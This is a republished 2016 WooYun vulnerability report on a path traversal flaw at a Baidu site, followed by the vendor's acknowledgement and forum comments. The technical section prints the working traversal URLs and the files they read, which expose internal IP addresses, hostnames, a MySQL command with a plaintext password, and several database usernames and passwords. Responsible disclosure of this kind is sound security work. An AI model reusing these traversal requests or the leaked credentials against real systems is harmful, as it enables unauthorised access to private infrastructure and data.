百度某站点任意文件遍历(泄漏多个数据库帐号密码)

2017年4月8日20:53:37评论342 views字数 213阅读0分42秒阅读模式

摘要

2016-03-29：细节已通知厂商并且等待厂商处理中
2016-03-29：厂商已经确认，细节仅向厂商公开
2016-04-08：细节向核心白帽子及相关领域专家公开
2016-04-18：细节向普通白帽子公开
2016-04-28：细节向实习白帽子公开
2016-05-13：细节向公众公开

漏洞概要关注数(74) 关注此漏洞

缺陷编号： WooYun-2016-190419

漏洞标题：百度某站点任意文件遍历(泄漏多个数据库帐号密码)

漏洞作者： lijiejie

提交时间： 2016-03-29 16:02

公开时间： 2016-05-13 20:00

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank： 12

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

14人收藏

漏洞详情

披露状态：

简要描述：

百度某站点任意文件遍历(泄漏数据库帐号密码等)

详细说明：

code 区域

http://dz.baidu.com/en/..///..///..///..///..///..///..///..///..///..////etc/sysconfig/network-scripts/ifcfg-eth1

可以读取任意本地文件。

漏洞证明：

code 区域

DEVICE=eth1
 BOOTPROTO=static
 IPADDR=10.26.186.23
 NETMASK=255.255.255.0
 ONBOOT=yes

得到IP地址是10.26.186.23。再读取/proc/self/environ:

code 区域

MANPATH=:/usr/share/baidu/man
 HOSTNAME=tc-dev-light01.tc.baidu.com
 TERM=linux
 SHELL=/bin/bash
 HISTSIZE=1000
 SSH_CLIENT=10.48.50.43 43745 22
 SSH_TTY=/dev/pts/0
 USER=work
 LD_LIBRARY_PATH=/home/op/opbin/optool/lib:
 LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
 SUDO_USER=zhaojianqi
 SUDO_UID=194560
 OPHOME=/home/op
 OPTOOL=/home/op/opbin/optool
 MAIL=/var/spool/mail/zhaojianqi
 PATH=/home/op/opbin/optool/bin:/home/op/opbin/optool/bin:/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/share/baidu/bin:/opt/bin:/home/opt/bin:/DoorGod/bin:/opt/bin:/home/opt/bin
 PWD=/home/work/php/sbin
 INPUTRC=/etc/inputrc
 EDITOR=vim
 LANG=en_US
 SUDO_COMMAND=/bin/bash
 SHLVL=5
 HOME=/home/work
 LOGNAME=work
 SSH_CONNECTION=10.48.50.43 43745 10.26.186.13 22
 LESSOPEN=|/usr/bin/lesspipe.sh %s
 PKG_CONFIG_PATH=/home/op/opbin/optool/lib/pkgconfig:/home/op/opbin/optool/lib/pkgconfig:
 SUDO_GID=100000
 G_BROKEN_FILENAMES=1
 _=/home/work/php/bin/php-cgi
 FPM_SOCKETS=/home/work/php/tmp/php-fpm.sock

得到主机名： HOSTNAME=tc-dev-light01.tc.baidu.com。.bash_history文件是存在的：

code 区域

http://dz.baidu.com/en/..///..///..///..///..///..///..///..///..///..////home/work/.bash_history

历史命令泄漏了MySQL密码：

code 区域

/home/work/mysql/bin/mysql -hsh01-dba-chunlei-lapp-01.sh01 -P5100 -pGOGZ7Wpr8wrjHS6g -Dlightpay -ulightpay_r  --default-character-set=utf8

源代码中还泄漏了数据库配置信息，有较多的数据库密码：

code 区域

http://dz.baidu.com/en/..///..///..///..///..///..///..///..///..///..////home/work/phpui/conf/bdDBProxyConfig.class.php
 
   /**
      * DBProxy集群的机器列表、访问集群时所用的用户名、密码、端口号、失败重试次数
      * @var array
      */
     static $arrDBProxyServer = array(
         self::DBPROXY_OPENPLATFORM_INDEX => array(    //open-platform dbproxy集群
             'username' => 'developer_w',
             'password' => 'v60KOStx8cMQrv60',
             'port' => 6014,
             'jx' => array(
                 '10.46.7.20',
                 '10.46.7.20',
             ),
             'tc' => array(
                 '10.42.8.18',
                 '10.42.8.18',
             ),
         ),
         self::DBPROXY_OPENPLATFORM_READONLY_INDEX => array(  //open-platform dbproxy集群
             'username' => 'openplatform_r',
             'password' => 'oY3DHhmW1BFfkUYy',
             'port' => 5352,
             'jx' => array(
                 '10.202.95.49',
             ),
             'tc' => array(
                 '10.202.95.49',
             ),
         ),
 其余省略

修复方案：

正确处理path

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-03-29 19:53

厂商回复：

感谢对百度安全的关注

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-29 16:08 | 猪猪侠 ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了，还要自由干吗？)

1

看标题就好厉害啊

1# 回复此人
2016-03-29 16:08 | Looke ( 普通白帽子 | Rank:1319 漏洞数:162 | Shell)

1

这节奏就是快啊

2# 回复此人
2016-03-29 16:09 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

1

看标题就好厉害啊

3# 回复此人
2016-03-29 16:09 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

1

这是为啥，为啥啊？？

4# 回复此人
2016-03-29 16:11 | netwind ( 普通白帽子 | Rank:250 漏洞数:41 | 挖掘漏洞为乐趣)

1

lijiejie进入开挂模式了

5# 回复此人
2016-03-29 16:12 | 举起手来 ( 核心白帽子 | Rank:1957 漏洞数:204 | 准备好，举起手来！)

1

越来越看不懂了，什么奇葩都有

6# 回复此人
2016-03-29 16:12 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

1

加入tangscan豪华套餐

7# 回复此人
2016-03-29 16:34 | 习总夸我好青年 ( 路人 | Rank:2 漏洞数:1 | 刚来的,请多关照)

1

lijiejie进入开挂模式了

8# 回复此人
2016-03-29 16:37 | JutaZ ( 实习白帽子 | Rank:95 漏洞数:14 | 少壮不努力老大徒伤悲)

1

必有神器出世

9# 回复此人
2016-03-29 16:44 | Arrow ( 实习白帽子 | Rank:42 漏洞数:14 )

1

开挂了今天

10# 回复此人
2016-03-29 16:51 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号：233sec 不定期分享各种漏洞思...)

1

李姐姐开挂了。。

11# 回复此人
2016-03-29 18:11 | 雅柏菲卡 ( 普通白帽子 | Rank:1299 漏洞数:259 | 雙魚座聖鬥士雅柏菲卡)

1

李姐姐好棒。

12# 回复此人
2016-05-13 21:26 | sauce ( 普通白帽子 | Rank:285 漏洞数:46 | 面向人民币编程)

0

这是什么原理。。看不懂

13# 回复此人
2016-05-14 16:24 | 仰望 ( 路人 | Rank:8 漏洞数:6 | 本人很懒，没有留下任何！)

0

这洞刷的666，不知什么神器。

14# 回复此人

漏洞概要 关注数(74) 关注此漏洞

缺陷编号： WooYun-2016-190419

漏洞标题： 百度某站点任意文件遍历(泄漏多个数据库帐号密码)

相关厂商： 百度

漏洞作者： lijiejie

提交时间： 2016-03-29 16:02

公开时间： 2016-05-13 20:00

漏洞类型： 任意文件遍历/下载

危害等级： 高

自评Rank： 12

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

14人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(74) 关注此漏洞

漏洞标题：百度某站点任意文件遍历(泄漏多个数据库帐号密码)

相关厂商：百度

漏洞类型：任意文件遍历/下载

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分